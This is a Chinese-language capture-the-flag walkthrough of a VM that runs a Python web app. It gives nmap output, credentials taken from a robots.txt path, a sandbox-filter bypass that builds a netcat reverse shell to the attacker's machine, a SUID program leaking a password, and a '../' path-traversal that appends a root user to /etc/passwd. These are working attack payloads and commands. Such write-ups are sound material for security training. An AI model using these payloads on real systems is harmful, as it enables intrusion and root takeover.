信息收集
tcp开放端口扫描
# Nmap 7.93 scan initiated Sat Sep 2 06:03:51 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:81:3C:60 (VMware)# Nmap done at Sat Sep 2 06:04:07 2023 -- 1 IP address (1 host up) scanned in 15.16 seconds
udp开放端口扫描
# Nmap 7.93 scan initiated Sat Sep 2 06:04:07 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.43.148
Warning: 192.168.43.148 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.43.148
Host is up (0.00077s latency).
All 65535 scanned ports on 192.168.43.148 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:81:3C:60 (VMware)# Nmap done at Sat Sep 2 06:05:33 2023 -- 1 IP address (1 host up) scanned in 86.07 seconds
开放端口服务扫描
# Nmap 7.93 scan initiated Sat Sep 2 06:05:33 2023 as: nmap -sT -sV -O -p22,80, -oA open_port_service 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00061s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)
MAC Address: 00:0C:29:81:3C:60 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 2 06:05:54 2023 -- 1 IP address (1 host up) scanned in 21.07 seconds
getshell
通过信息收集发现靶机开放22和80端口,优先对80端口进行渗透测试。
robots.txt敏感信息发现
使用浏览器打开靶机http服务网站,发现robotx.txt路径下有三个目录
User-agent: * Disallow: /register Disallow: /login Disallow: /zbir7mn240soxhicso2z
一一进行查看,在http://192.168.43.148/zbir7mn240soxhicso2z页面发现一个凭据,保存下来。
Username: steve
Password: bvbkukHAeVxtjjVH
访问/login目录,使用刚刚获取到的凭据进行登录,成功登陆后显示以下画面
点击Welcome back,steve!跳转到python代码执行页面
根据页面信息提示获取到代码执行检测语句
def check_if_safe(code: str) -> bool: if 'import' in code: # import is too dangerous return False elif 'os' in code: # os is too dangerous return False elif 'open' in code: # opening files is also too dangerous return False else: return True
可以看到会检测代码中是否存在import,os,open字符,若有则不能执行代码,此时需要进行绕过。
根据python沙箱逃逸总结_拓海AE的博客-CSDN博客,构造出反弹shell payload语句
print(getattr(getattr(__builtins__, '__tropmi__'[::-1])('so'[::-1]), 'metsys'[::-1])('nc -e /bin/bash 192.168.43.128 443'))
kali执行rlwrap nc -lvnp 443 进行监听,然后执行payload
成功获取到反弹shell!
提权
在py家目录下发现suid文件typing且有源码typing.cc,
#include <iostream>
#include <string>
#include <iterator>
#include <fstream>
#include <algorithm>int main(){
std::cout<<"Let's play a game! If you can type the sentence below, then I'll tell you my password.\n\n";std::string text="the quick brown fox jumps over the lazy dog";
std::cout<<text<<'\n';std::string line;
std::getline(std::cin,line);if(line==text){
std::ifstream password_file("/home/py/password.txt");
std::istreambuf_iterator<char> buf_it(password_file),buf_end;
std::ostreambuf_iterator<char> out_it (std::cout);
std::copy(buf_it,buf_end,out_it);
}
else{
std::cout<<"WRONG!!!\n";
}
}
查看后发现只要输入 the quick brown fox jumps over the lazy dog就会打印/home/py/password.txt文件内容。因此执行文件,输入 the quick brown fox jumps over the lazy dog,获取到密码
54ezhCGaJV
成功切换到py用户。
继续进行敏感信息枚举,在/home/py/secret_stuff/下发现root属主的suid文件backup和源码backup.cc文件,阅读源码
#include <iostream>
#include <string>
#include <fstream>int main(){
std::cout<<"Enter a line of text to back up: ";
std::string line;
std::getline(std::cin,line);
std::string path;
std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
std::getline(std::cin,path);if(!path.starts_with("/srv/backups/")){
std::cout<<"The file must be inside the /srv/backups directory!\n";
}
else{
std::ofstream backup_file(path,std::ios_base::app);
backup_file<<line<<'\n';
}return 0;
}
发现其功能是往文件中追加内容,其限制规则的逻辑是判断备份目录是否以/srv/backups开头,因此我们可以使用../绕过限制,往/etc/passwd(修改passwd,shadow,sudoers等配置文件都行)加入root用户xiaoliyu。
kali上使用openssl工具获取加密hash
openssl passwd -1 -salt xiaoliyu 1234567
$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/
靶机cat /etc/passwd|grep root,获取root行数据,将x替换为kali上生成的hash值,得到加入语句为
xiaoliyu:$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/:0:0::/root:/bin/bash
执行backup文件,输入payload和文件名
然后切换xiaoliyu用户,密码为1234567,成功!。